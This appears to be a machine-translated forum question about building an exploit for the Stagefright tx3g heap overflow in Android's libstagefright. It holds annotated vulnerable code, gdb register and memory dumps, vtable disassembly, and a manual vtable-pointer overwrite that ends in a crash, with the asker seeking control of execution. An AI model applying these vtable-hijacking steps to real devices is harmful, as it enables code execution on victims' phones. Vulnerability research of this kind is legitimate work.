Vtable: ricerca del puntatore vtable

2
  // overflow here, so that size + chunk_size == 32 and size > 32
    uint8_t *buffer = new uint8_t[size + chunk_size];
    // buffer is allocated immediately before mDataSource
    if (size > 0) {
        // this will overflow and corrupt the mDataSource vtable 
        memcpy(buffer, data, size);
    }
    // this call goes through the corrupt vtable, and we get control of execution
    if ((size_t)(mDataSource->readAt(*offset, buffer + size, chunk_size))
            < chunk_size) {

Ho impostato breakpoint prima e dopo memcpy () e speravo di vedere l'addr della funzione readAt () in vtable, ma in qualche modo non è lì.

Come posso trovarlo?

L'indirizzo della funzione readAt () è

(gdb) b android::MPEG4DataSource::readAt
Breakpoint 3 at 0xb6704b68

chiamata memcpy:

   0xb670a5c6 <+6702>:  ldr r1, [sp, #96]   ; 0x60
   0xb670a5c8 <+6704>:  blx 0xb66e3f84 <memcpy@plt>
   0xb670a5cc <+6708>:  ldr r0, [r6, #80]   ; 0x50

registri

(gdb) i r
r0             0xb7499ab8   3075054264
r1             0xb749b800   3075061760
r2             0x7d 125
r3             0xffffffff   4294967295
r4             0x7d 125
r5             0x0  0
r6             0xb749a250   3075056208
r7             0xb4e83540   3035116864
r8             0xb7499ab8   3075054264
r9             0xb4e83a68   3035118184
r10            0x5c 92
r11            0x1  1
r12            0x1  1
sp             0xb4e834d0   0xb4e834d0
lr             0xb6f14a43   -1225700797
pc             0xb670a5c8   0xb670a5c8 <android::MPEG4Extractor::parseChunk(long long*, int)+6704>
cpsr           0xa0070030   -1610153936

buffer dump (è all'indirizzo R0)

(gdb) x/20000x 0xb7499ab8
0xb7499ab8: 0xb6f45130  0xb6f45130  0x41414141  0x41414141
0xb7499ac8: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7499ad8: 0x00000000  0x00000000  0x00000030  0x00000023
0xb7499ae8: 0x00000001  0x00000001  0xb749ab10  0x00000000
0xb7499af8: 0x74732d74  0x6d616572  0x00000020  0x00000033
0xb7499b08: 0xb67beee8  0xb7499b38  0xb7499b50  0x00000000
0xb7499b18: 0xb7495860  0x00000000  0x0000001c  0x00000000
0xb7499b28: 0x0100024c  0xb1cb3008  0x00000000  0x0000001b
0xb7499b38: 0x00000001  0x00000001  0xb7499b08  0x00000000
0xb7499b48: 0x00000000  0x0000002b  0xb67be688  0xb7499b78
0xb7499b58: 0x00000000  0xb67be678  0xb7499b90  0xb67be678
0xb7499b68: 0xb7499ba0  0x00000000  0x00000000  0x0000001b
0xb7499b78: 0x00000001  0x00000001  0xb7499b50  0x00000000
0xb7499b88: 0x00000000  0x00000013  0x00000000  0xb7499c60
0xb7499b98: 0xb7499bb0  0x00000013  0x00000720  0xb7499c70
0xb7499ba8: 0xb7499c70  0x00000013  0xb6705e65  0xb7499b90
0xb7499bb8: 0xb7499bc0  0x00000013  0xb674d971  0xb7499bb0
0xb7499bc8: 0xb7499bd0  0x00000013  0xb672ac11  0xb7499bc0
0xb7499bd8: 0xb7499be0  0x00000013  0xb6732a79  0xb7499bd0
0xb7499be8: 0xb7499bf0  0x00000013  0xb670090d  0xb7499be0
0xb7499bf8: 0xb7499c00  0x00000013  0xb66f1d61  0xb7499bf0
0xb7499c08: 0xb7499c10  0x00000013  0xb675f3b5  0xb7499c00
0xb7499c18: 0xb7499c20  0x00000013  0xb6701dad  0xb7499c10
---Type <return> to continue, or q <return> to quit---
0xb7499c28: 0xb7499c30  0x00000013  0xb66f0b91  0xb7499c20
0xb7499c38: 0xb7499c40  0x00000013  0xb675dbdd  0xb7499c30
0xb7499c48: 0xb7499c50  0x00000013  0xb6733999  0xb7499c40
0xb7499c58: 0xb7499c60  0x00000013  0xb6734f85  0xb7499c50
0xb7499c68: 0xb7499b90  0x00000013  0xb50c50d5  0xb7499ba0
0xb7499c78: 0xb7499ba0  0x0000002b  0x4c4c4c4c  0x4c4c4c4c
0xb7499c88: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499c98: 0x4c4c4c4c  0x4c4c4c4c  0x00000008  0x0000002b
0xb7499ca8: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499cb8: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499cc8: 0x2f6e6f69  0x0000001b  0x00000002  0x00000002
0xb7499cd8: 0xb749bad8  0x00000000  0x00000018  0x00000023
0xb7499ce8: 0x000011c7  0x00000000  0x00010000  0x00000000
0xb7499cf8: 0xb7499808  0xb74969e8  0x00000020  0x00000013
0xb7499d08: 0xb7499838  0xb7499828  0xb7499d40  0x0000001b
0xb7499d18: 0xb3107008  0x00010000  0xb749b330  0x00000000
0xb7499d28: 0x00000018  0x00000013  0xb3118008  0x00010000
0xb7499d38: 0x007cf93a  0x00000013  0xb7499d30  0xb7499d08
0xb7499d48: 0xb7499d88  0x0000001b  0xb30f6008  0x00010000
0xb7499d58: 0xb749a2f0  0x00000000  0x00000018  0x00000023
0xb7499d68: 0x0000116a  0x00000000  0x00010000  0x00000000
0xb7499d78: 0xb74969e8  0xb7499d98  0x00000020  0x00000013
0xb7499d88: 0xb7499d18  0xb7499d40  0xb7499db8  0x00000023
---Type <return> to continue, or q <return> to quit---
0xb7499d98: 0x00001366  0x00000000  0x00010000  0x00000000
0xb7499da8: 0xb7499d68  0xb7496a40  0x00000020  0x00000013
0xb7499db8: 0xb7499d50  0xb7499d88  0xb7499dd8  0x00000013
0xb7499dc8: 0xb30e5008  0x00010000  0xb749a2f0  0x00000013
0xb7499dd8: 0xb7499dc8  0xb7499db8  0xb7499e10  0x0000001b
0xb7499de8: 0xb30c3008  0x00010000  0xb749b330  0x00000000
0xb7499df8: 0x00000018  0x00000013  0xb30d4008  0x00010000
0xb7499e08: 0x00540048  0x00000013  0xb7499e00  0xb7499dd8
0xb7499e18: 0xb7499e20  0x00000013  0xb7499de8  0xb7499e10
0xb7499e28: 0xb7499e58  0x0000001b  0xb30a1008  0x00010000
0xb7499e38: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb7499e48: 0xb30b2008  0x00010000  0x00540048  0x00000013
0xb7499e58: 0xb7499e48  0xb7499e20  0xb7499e68  0x00000013
0xb7499e68: 0xb7499e30  0xb7499e58  0xb7499e88  0x00000013
0xb7499e78: 0xb3090008  0x00010000  0x0065006d  0x00000013
0xb7499e88: 0xb7499e78  0xb7499e68  0xb7499ea8  0x00000013
0xb7499e98: 0xb307f008  0x00010000  0x0065006d  0x00000013
0xb7499ea8: 0xb7499e98  0xb7499e88  0xb7499ec8  0x00000013
0xb7499eb8: 0xb306e008  0x00010000  0x0065006d  0x00000013
0xb7499ec8: 0xb7499eb8  0xb7499ea8  0xb7499ee8  0x00000013
0xb7499ed8: 0xb1ca2008  0x00010000  0x0065006d  0x00000013
0xb7499ee8: 0xb7499ed8  0xb7499ec8  0xb7499f08  0x00000013
0xb7499ef8: 0xb1c91008  0x00010000  0x0065006d  0x00000013
---Type <return> to continue, or q <return> to quit---
0xb7499f08: 0xb7499ef8  0xb7499ee8  0xb7499f28  0x00000013
0xb7499f18: 0xb1c80008  0x00010000  0x0065006d  0x00000013
0xb7499f28: 0xb7499f18  0xb7499f08  0xb7499f48  0x00000013
0xb7499f38: 0xb1c6f008  0x00010000  0x0065006d  0x00000013
0xb7499f48: 0xb7499f38  0xb7499f28  0xb7499f68  0x00000013
0xb7499f58: 0xb1c5e008  0x00010000  0x0065006d  0x00000013
0xb7499f68: 0xb7499f58  0xb7499f48  0xb7499f88  0x00000013
0xb7499f78: 0xb1c4d008  0x00010000  0x0065006d  0x00000013
0xb7499f88: 0xb7499f78  0xb7499f68  0xb7499fa8  0x00000013
0xb7499f98: 0xb1c3c008  0x00010000  0x0065006d  0x00000013
0xb7499fa8: 0xb7499f98  0xb7499f88  0xb7499fc8  0x00000013
0xb7499fb8: 0xb1c2b008  0x00010000  0x0065006d  0x00000013
0xb7499fc8: 0xb7499fb8  0xb7499fa8  0xb7499fe8  0x00000013
0xb7499fd8: 0xb1c1a008  0x00010000  0x0065006d  0x00000013
0xb7499fe8: 0xb7499fd8  0xb7499fc8  0xb749a008  0x00000013
0xb7499ff8: 0xb1c09008  0x00010000  0x0065006d  0x00000013
0xb749a008: 0xb7499ff8  0xb7499fe8  0xb749a028  0x00000013
0xb749a018: 0xb1bf8008  0x00010000  0x0065006d  0x00000013
0xb749a028: 0xb749a018  0xb749a008  0xb749a048  0x00000013
0xb749a038: 0xb1be7008  0x00010000  0x0065006d  0x00000013
0xb749a048: 0xb749a038  0xb749a028  0xb749a068  0x00000013
0xb749a058: 0xb1bd6008  0x00010000  0x0065006d  0x00000013
0xb749a068: 0xb749a058  0xb749a048  0xb749a088  0x00000013
---Type <return> to continue, or q <return> to quit---
0xb749a078: 0xb1bc5008  0x00010000  0x0065006d  0x00000013
0xb749a088: 0xb749a078  0xb749a068  0xb749a0a8  0x00000013
0xb749a098: 0xb1bb4008  0x00010000  0x0065006d  0x00000013
0xb749a0a8: 0xb749a098  0xb749a088  0xb749a0e0  0x0000001b
0xb749a0b8: 0xb1b92008  0x00010000  0xb749b330  0x00000000
0xb749a0c8: 0x00000018  0x00000013  0xb1ba3008  0x00010000
0xb749a0d8: 0x00540048  0x00000013  0xb749a0d0  0xb749a0a8
0xb749a0e8: 0xb749a0f0  0x00000013  0xb749a0b8  0xb749a0e0
0xb749a0f8: 0xb749a128  0x0000001b  0xb1b70008  0x00010000
0xb749a108: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a118: 0xb1b81008  0x00010000  0x00540048  0x00000013
0xb749a128: 0xb749a118  0xb749a0f0  0xb749a138  0x00000013
0xb749a138: 0xb749a100  0xb749a128  0xb749a158  0x00000013
0xb749a148: 0xb1b5f008  0x00010000  0x0065006d  0x00000013
0xb749a158: 0xb749a148  0xb749a138  0xb749a178  0x00000013
0xb749a168: 0xb1b4e008  0x00010000  0x0065006d  0x00000013
0xb749a178: 0xb749a168  0xb749a158  0xb749a1b0  0x0000001b
0xb749a188: 0xb1b2c008  0x00010000  0xb749b330  0x00000000
0xb749a198: 0x00000018  0x00000013  0xb1b3d008  0x00010000
0xb749a1a8: 0x00540048  0x00000013  0xb749a1a0  0xb749a178
0xb749a1b8: 0xb749a1d8  0x0000001b  0xb1b1b008  0x00010000
0xb749a1c8: 0xb749a2f0  0x00000000  0x00000018  0x00000013
0xb749a1d8: 0xb749a188  0xb749a1b0  0xb749a1e8  0x00000013
---Type <return> to continue, or q <return> to quit---
0xb749a1e8: 0xb749a1c0  0xb749a1d8  0xb749a220  0x0000001b
0xb749a1f8: 0xb1af9008  0x00010000  0xb749a2f0  0x00000000
0xb749a208: 0x00000018  0x00000013  0xb1b0a008  0x00010000
0xb749a218: 0x00000000  0x00000013  0xb749a210  0xb749a1e8
0xb749a228: 0xb749a230  0x00000013  0xb749a1f8  0xb749a220
0xb749a238: 0xb7495ed0  0x00000013  0xb1ae8008  0x00010000
0xb749a248: 0x00000010  0x000000a3  0xb67bedc8  0xb74998c0
0xb749a258: 0x66657400  0xb67bed28  0x00000000  0x00000000
0xb749a268: 0x00000000  0x00000008  0x00000000  0x00000000
0xb749a278: 0xb67bed50  0xb749bbc8  0x0000001c  0x00000000
0xb749a288: 0x00000018  0xb67bed78  0x00000000  0x00000000
0xb749a298: 0x00000000  0x00000014  0xb749bad8  0xffffffed
0xb749a2a8: 0x00000000  0x00000000  0xb7499a40  0xb7499a40
0xb749a2b8: 0xb74998d8  0xb67bcb60  0xb74998a8  0x00000003
0xb749a2c8: 0x00000007  0x00000004  0xb7429680  0xb7429680
0xb749a2d8: 0xb7429680  0x00000000  0x00000000  0x00000000
0xb749a2e8: 0x00000000  0x00000013  0xb748d820  0xb748d810
0xb749a2f8: 0xb749a310  0x00000013  0xb1a1c008  0x00010000
0xb749a308: 0xb749bb50  0x00000013  0xb749a300  0xb749a2f0
0xb749a318: 0xb749a330  0x00000013  0xb1a0b008  0x00010000
0xb749a328: 0xb749b330  0x00000013  0xb749a320  0xb749a310
0xb749a338: 0xb749a350  0x00000013  0xb19fa008  0x00010000
0xb749a348: 0xb749bb50  0x00000013  0xb749a340  0xb749a330
---Type <return> to continue, or q <return> to quit---
0xb749a358: 0xb749a370  0x00000013  0xb19e9008  0x00010000
0xb749a368: 0xb749b330  0x00000013  0xb749a360  0xb749a350
0xb749a378: 0xb749a3a8  0x0000001b  0xb19c7008  0x00010000
0xb749a388: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a398: 0xb19d8008  0x00010000  0x00540048  0x00000013
0xb749a3a8: 0xb749a398  0xb749a370  0xb749a3b8  0x00000013
0xb749a3b8: 0xb749a380  0xb749a3a8  0xb749a3d8  0x00000013
0xb749a3c8: 0xb19b6008  0x00010000  0xb749bb50  0x00000013
0xb749a3d8: 0xb749a3c8  0xb749a3b8  0xb749a3f8  0x00000013
0xb749a3e8: 0xb19a5008  0x00010000  0xb749b330  0x00000013
0xb749a3f8: 0xb749a3e8  0xb749a3d8  0xb749a418  0x00000013
0xb749a408: 0xb1994008  0x00010000  0xb749bb50  0x00000013
0xb749a418: 0xb749a408  0xb749a3f8  0xb749a438  0x00000013
0xb749a428: 0xb1983008  0x00010000  0xb749b330  0x00000013
0xb749a438: 0xb749a428  0xb749a418  0xb749a470  0x0000001b
0xb749a448: 0xb1961008  0x00010000  0xb749bb50  0x00000000
0xb749a458: 0x00000018  0x00000013  0xb1972008  0x00010000
0xb749a468: 0x00540048  0x00000013  0xb749a460  0xb749a438
0xb749a478: 0xb749a480  0x00000013  0xb749a448  0xb749a470
0xb749a488: 0xb749a4a0  0x00000013  0xb1950008  0x00010000
0xb749a498: 0xb749bb50  0x00000013  0xb749a490  0xb749a480
0xb749a4a8: 0xb749a4c0  0x00000013  0xb193f008  0x00010000
0xb749a4b8: 0xb749b330  0x00000013  0xb749a4b0  0xb749a4a0
---Type <return> to continue, or q <return> to quit---
0xb749a4c8: 0xb749a4e0  0x00000013  0xb192e008  0x00010000
0xb749a4d8: 0xb749bb50  0x00000013  0xb749a4d0  0xb749a4c0
0xb749a4e8: 0xb749a500  0x00000013  0xb191d008  0x00010000
0xb749a4f8: 0xb749b330  0x00000013  0xb749a4f0  0xb749a4e0
0xb749a508: 0xb749a538  0x0000001b  0xb18fb008  0x00010000
0xb749a518: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a528: 0xb190c008  0x00010000  0x00540048  0x00000013
0xb749a538: 0xb749a528  0xb749a500  0xb749a548  0x00000013
0xb749a548: 0xb749a510  0xb749a538  0xb749a568  0x00000013
0xb749a558: 0xb18ea008  0x00010000  0xb749bb50  0x00000013
0xb749a568: 0xb749a558  0xb749a548  0xb749a588  0x00000013
0xb749a578: 0xb18d9008  0x00010000  0xb749b330  0x00000013
0xb749a588: 0xb749a578  0xb749a568  0xb749a5c0  0x0000001b
0xb749a598: 0xb18b7008  0x00010000  0xb749bb50  0x00000000
0xb749a5a8: 0x00000018  0x00000013  0xb18c8008  0x00010000
0xb749a5b8: 0x00540048  0x00000013  0xb749a5b0  0xb749a588
0xb749a5c8: 0xb749a5d0  0x00000013  0xb749a598  0xb749a5c0
0xb749a5d8: 0xb749a608  0x0000001b  0xb1895008  0x00010000
0xb749a5e8: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a5f8: 0xb18a6008  0x00010000  0x00540048  0x00000013
0xb749a608: 0xb749a5f8  0xb749a5d0  0xb749a618  0x00000013
0xb749a618: 0xb749a5e0  0xb749a608  0xb749a638  0x00000013
0xb749a628: 0xb1884008  0x00010000  0xb749bb50  0x00000013
---Type <return> to continue, or q <return> to quit---
0xb749a638: 0xb749a628  0xb749a618  0xb749a658  0x00000013
0xb749a648: 0xb1873008  0x00010000  0xb749b330  0x00000013
0xb749a658: 0xb749a648  0xb749a638  0xb749a678  0x00000013
0xb749a668: 0xb1862008  0x00010000  0xb749bb50  0x00000013
0xb749a678: 0xb749a668  0xb749a658  0xb749a698  0x00000013
0xb749a688: 0xb1851008  0x00010000  0xb749b330  0x00000013
0xb749a698: 0xb749a688  0xb749a678  0xb749a6b8  0x00000013
0xb749a6a8: 0xb1840008  0x00010000  0xb749bb50  0x00000013
0xb749a6b8: 0xb749a6a8  0xb749a698  0xb749a6d8  0x00000013
0xb749a6c8: 0xb182f008  0x00010000  0xb749b330  0x00000013
0xb749a6d8: 0xb749a6c8  0xb749a6b8  0xb749a6f8  0x00000013
0xb749a6e8: 0xb181e008  0x00010000  0xb749bb50  0x00000013
0xb749a6f8: 0xb749a6e8  0xb749a6d8  0xb749a718  0x00000013
0xb749a708: 0xb180d008  0x00010000  0xb749b330  0x00000013
0xb749a718: 0xb749a708  0xb749a6f8  0xb749a750  0x0000001b
0xb749a728: 0xb17eb008  0x00010000  0xb749bb50  0x00000000
0xb749a738: 0x00000018  0x00000013  0xb17fc008  0x00010000
0xb749a748: 0x00540048  0x00000013  0xb749a740  0xb749a718
0xb749a758: 0xb749a778  0x0000001b  0xb17da008  0x00010000
0xb749a768: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a778: 0xb749a728  0xb749a750  0xb749a788  0x00000013
0xb749a788: 0xb749a760  0xb749a778  0xb749a7c0  0x0000001b
0xb749a798: 0xb17b8008  0x00010000  0xb749b330  0x00000000
---Type <return> to continue, or q <return> to quit---
0xb749a7a8: 0x00000018  0x00000013  0xb17c9008  0x00010000
0xb749a7b8: 0x00540048  0x00000013  0xb749a7b0  0xb749a788
0xb749a7c8: 0xb749a7d0  0x00000013  0xb749a798  0xb749a7c0
0xb749a7d8: 0xb749a7f0  0x00000013  0xb17a7008  0x00010000
0xb749a7e8: 0xb749b330  0x00000013  0xb749a7e0  0xb749a7d0
0xb749a7f8: 0xb749a810  0x00000013  0xb1796008  0x00010000
0xb749a808: 0xb749bb50  0x00000013  0xb749a800  0xb749a7f0
0xb749a818: 0xb749a848  0x0000001b  0xb1774008  0x00010000
0xb749a828: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a838: 0xb1785008  0x00010000  0x00540048  0x00000013
0xb749a848: 0xb749a838  0xb749a810  0xb749a858  0x00000013
0xb749a858: 0xb749a820  0xb749a848  0xb749a878  0x00000013
0xb749a868: 0xb1763008  0x00010000  0xb749b330  0x00000013
0xb749a878: 0xb749a868  0xb749a858  0xb749a898  0x00000013
0xb749a888: 0xb1752008  0x00010000  0xb749bb50  0x00000013
0xb749a898: 0xb749a888  0xb749a878  0xb749a8b8  0x00000013
0xb749a8a8: 0xb1741008  0x00010000  0xb749b330  0x00000013
0xb749a8b8: 0xb749a8a8  0xb749a898  0xb749a8d8  0x00000013
0xb749a8c8: 0xb1730008  0x00010000  0xb749bb50  0x00000013
0xb749a8d8: 0xb749a8c8  0xb749a8b8  0xb749a8f8  0x00000013
0xb749a8e8: 0xb171f008  0x00010000  0xb749b330  0x00000013
0xb749a8f8: 0xb749a8e8  0xb749a8d8  0xb749a930  0x0000001b
0xb749a908: 0xb16fd008  0x00010000  0xb749bb50  0x00000000
---Type <return> to continue, or q <return> to quit---
0xb749a918: 0x00000018  0x00000013  0xb170e008  0x00010000
0xb749a928: 0x00540048  0x00000013  0xb749a920  0xb749a8f8
0xb749a938: 0xb749a958  0x0000001b  0xb16ec008  0x00010000
0xb749a948: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a958: 0xb749a908  0xb749a930  0xb749a980  0x0000001b
0xb749a968: 0xb16db008  0x00010000  0xb749bb50  0x00000000
0xb749a978: 0x00000018  0x00000013  0xb749a940  0xb749a958
0xb749a988: 0xb749a9a8  0x0000001b  0xb16ca008  0x00010000
0xb749a998: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a9a8: 0xb749a968  0xb749a980  0xb749a9b8  0x00000013
0xb749a9b8: 0xb749a990  0xb749a9a8  0xb749a9d8  0x00000013
0xb749a9c8: 0xb16b9008  0x00010000  0xb749b330  0x00000013
0xb749a9d8: 0xb749a9c8  0xb749a9b8  0xb749a9f8  0x00000013
0xb749a9e8: 0xb16a8008  0x00010000  0xb749bb50  0x00000013
0xb749a9f8: 0xb749a9e8  0xb749a9d8  0xb749aa18  0x00000013
0xb749aa08: 0xb1697008  0x00010000  0xb749b330  0x00000013
0xb749aa18: 0xb749aa08  0xb749a9f8  0xb749aa38  0x00000013
0xb749aa28: 0xb1686008  0x00010000  0xb749bb50  0x00000013
0xb749aa38: 0xb749aa28  0xb749aa18  0xb749aa58  0x00000013
0xb749aa48: 0xb1675008  0x00010000  0xb749b330  0x00000013
0xb749aa58: 0xb749aa48  0xb749aa38  0xb749aa78  0x00000013
0xb749aa68: 0xb1664008  0x00010000  0xb749bb50  0x00000013
0xb749aa78: 0xb749aa68  0xb749aa58  0xb749aab0  0x0000001b
---Type <return> to continue, or q <return> to quit---
0xb749aa88: 0xb1642008  0x00010000  0xb749b330  0x00000000
0xb749aa98: 0x00000018  0x00000013  0xb1653008  0x00010000
0xb749aaa8: 0x00540048  0x00000013  0xb749aaa0  0xb749aa78
0xb749aab8: 0xb749b330  0x00000023  0x00001464  0x00000000
0xb749aac8: 0x00010000  0x00000000  0xb749b398  0xb749aaf0
0xb749aad8: 0xb6f45138  0x00000013  0xb15dc008  0x00010000
0xb749aae8: 0xb749bbe8  0x00000023  0x0000149b  0x00000000
0xb749aaf8: 0x00010000  0x00000011  0xb749aac0  0xb7495e58
0xb749ab08: 0x00000020  0x00000823  0xb68eb970  0xb7499ae8
0xb749ab18: 0x66657463  0x00000001  0xb6f45220  0x00000006
0xb749ab28: 0x00000000  0x00000000  0x00000000  0x00000006
0xb749ab38: 0x00000001  0x00000000  0xb1cb3008  0x00000000
0xb749ab48: 0x00000000  0x00000000  0x00000000  0x00000004
0xb749ab58: 0x00000005  0x00000000  0x0100024c  0x00000000
0xb749ab68: 0x00000000  0x00000000  0x00000000  0x00000004
0xb749ab78: 0x00000002  0x00000000  0x00000000  0x00000000
0xb749ab88: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ab98: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749aba8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abb8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abc8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abd8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abe8: 0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0xb749abf8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac08: 0x00000000  0x000083d1  0x00000000  0x00000000
0xb749ac18: 0x00008f00  0x0000800a  0x00000000  0x00000000
0xb749ac28: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac38: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac48: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac58: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac68: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac78: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac88: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac98: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749aca8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acb8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acc8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acd8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ace8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acf8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad08: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad18: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad28: 0x00000000  0x000082b1  0x00000000  0x00000000
0xb749ad38: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad48: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad58: 0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---

Come posso trovare il puntatore readAt () che voglio sovrascrivere?

C'è un modo per vedere quali addres nell'intervallo 0xb7499ab8 saranno accessibili successivamente?

La piattaforma è ARM (Android, Cyanogenmod)

Grazie,

Aggiornamento 1:

Modificata la sorgente per mostrare l'indirizzo del buffer e mDataSource

V/MPEG4Extractor( 5106): chunk: tx3g @ 16777864, 1
V/MPEG4Extractor( 5106): buffer addy = 0xb72f6cd0
V/MPEG4Extractor( 5106): mDataSource addy = 0xb72f4ea0

Con il buffer la mia comprensione era corretta, ma con mDataSource, non ho conoscenze.

Dopo la chiamata a memcpy ()

(gdb) x/20x 0xb72f6cd0
0xb72f6cd0: 0x7d000000  0x67337874  0x41414141  0x41414141
0xb72f6ce0: 0x41414141  0x41414141  0x41414141  0x41414141
0xb72f6cf0: 0x99999999  0x88888888  0x42424242  0x42424242
0xb72f6d00: 0x42424242  0x42424242  0x42424242  0x42424242
0xb72f6d10: 0x42424242  0x42424242  0x42424242  0x42424242

0x99999999 dovrebbe sovrascrivere il puntatore vtable mDataSource, ma questo è chiaramente sbagliato nell'exploit. Poiché mDataSource si trova a 0xb72f4ea0 e questo è ciò che ha:

(gdb) x/20 0xb72f4ea0
0xb72f4ea0: 0xb72f5120  0xffffffed  0x00000000  0x00000000
0xb72f4eb0: 0xb72f3a38  0xb72f3a38  0xb72f4ef0  0xb67c5b60
0xb72f4ec0: 0xb72f4ff8  0x00000001  0x00000007  0x00000004
0xb72f4ed0: 0xb7289680  0xb7289680  0xb7289680  0x00000000
0xb72f4ee0: 0x00000000  0x00000000  0x00000000  0x00000023


(gdb) x/60 0xb72f4ea0-64
0xb72f4e60: 0x00000000  0x00000000  0x00000000  0x00000008
0xb72f4e70: 0x00000000  0x00000000  0xb67c7d50  0xb72f6fc8
0xb72f4e80: 0x00000010  0x00000000  0x00000018  0xb67c7d78
0xb72f4e90: 0x00000000  0x00000000  0x00000000  0x00000014
0xb72f4ea0: 0xb72f5120  0xffffffed  0x00000000  0x00000000
0xb72f4eb0: 0xb72f3a38  0xb72f3a38  0xb72f4ef0  0xb67c5b60
0xb72f4ec0: 0xb72f4ff8  0x00000001  0x00000007  0x00000004
0xb72f4ed0: 0xb7289680  0xb7289680  0xb7289680  0x00000000
0xb72f4ee0: 0x00000000  0x00000000  0x00000000  0x00000023
0xb72f4ef0: 0xb67c8cb8  0xb72f4f10  0xb67c8c88  0x00000000
0xb72f4f00: 0x00000000  0x00000000  0x00000010  0x0000001b
0xb72f4f10: 0x00000001  0x00000001  0xb72f4ef0  0x00000000
0xb72f4f20: 0x00000000  0x00000023  0x00001318  0x00000000
0xb72f4f30: 0x00010000  0x00000000  0xb72f38a0  0xb72f38d0
0xb72f4f40: 0x00000020  0x00000013  0xb72f4d50  0xb72f4d40

Come posso sovrascrivere mDataSource per ottenere il controllo dell'esecuzione?

Aggiornamento 2:

aha .... mDataSource è un puntatore al puntatore, quindi prova questo:

Debug per Android:

V/MPEG4Extractor( 5570): chunk: avcC @ 16777832, 1
V/MPEG4Extractor( 5570): entering parseChunk 16777848/1
V/MPEG4Extractor( 5570): chunk: hvcC @ 16777848, 1
V/MPEG4Extractor( 5570): entering parseChunk 16777864/1
V/MPEG4Extractor( 5570): chunk: tx3g @ 16777864, 1
V/MPEG4Extractor( 5570): buffer addy = 0xb87a22d8
V/MPEG4Extractor( 5570): mDataSource addy = 0xb87a1488




(gdb) x/10x 0xb87a1488
0xb87a1488: 0xb87a1928  0xffffffed  0x00000000  0x00000000
0xb87a1498: 0xb879f170  0xb879f170  0xb87a14d8  0xb6795b60
0xb87a14a8: 0xb87a1600  0x00000001
(gdb) x/10x 0xb87a1928
0xb87a1928: 0xb6797ee8  0xb879f2d8  0xb87a1958  0x00000000
0xb87a1938: 0xb879ea60  0x00690064  0x0000001c  0x00000000
0xb87a1948: 0x0100024c  0xb1e24008

(gdb) disass 0xb6797ee8
Dump of assembler code for function _ZTVN7android15MPEG4DataSourceE:
   0xb6797ee0 <+0>: andeq   r0, r0, r0
   0xb6797ee4 <+4>: andeq   r0, r0, r0
   0xb6797ee8 <+8>:         ; <UNDEFINED> instruction: 0xb66dde5d
   0xb6797eec <+12>:            ; <UNDEFINED> instruction: 0xb66dde99
   0xb6797ef0 <+16>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797ef4 <+20>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797ef8 <+24>:            ; <UNDEFINED> instruction: 0xb6cbc513
   0xb6797efc <+28>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797f00 <+32>:            ; <UNDEFINED> instruction: 0xb66d70fd
   0xb6797f04 <+36>:            ; <UNDEFINED> instruction: 0xb66dcb1d
   0xb6797f08 <+40>:            ; <UNDEFINED> instruction: 0xb66dc4b7
   0xb6797f0c <+44>:    strbtlt r12, [sp], -r3, asr #9
   0xb6797f10 <+48>:            ; <UNDEFINED> instruction: 0xb66c8955
   0xb6797f14 <+52>:    strbtlt r6, [sp], -r5, ror #9
   0xb6797f18 <+56>:            ; <UNDEFINED> instruction: 0xb66bdc73
   0xb6797f1c <+60>:    strbtlt r6, [sp], -r5, lsr #8
   0xb6797f20 <+64>:            ; <UNDEFINED> instruction: 0xb66d6431
End of assembler dump.


So I tried to set:

0xb87a1928 to 0x11111111



(gdb) set *((int *) 0xb87a1928) = 0x11111111
(gdb) x/30x 0xb87a1928
0xb87a1928: 0x11111111  0xb879f2d8  0xb87a1958  0x00000000
0xb87a1938: 0xb879ea60  0x00690064  0x0000001c  0x00000000

Contine

Thread 12 "Binder_2" received signal SIGSEGV, Segmentation fault.
0xb66e1042 in android::MPEG4Extractor::parseChunk(long long*, int) () from /system/lib/libstagefright.so
(gdb) i r
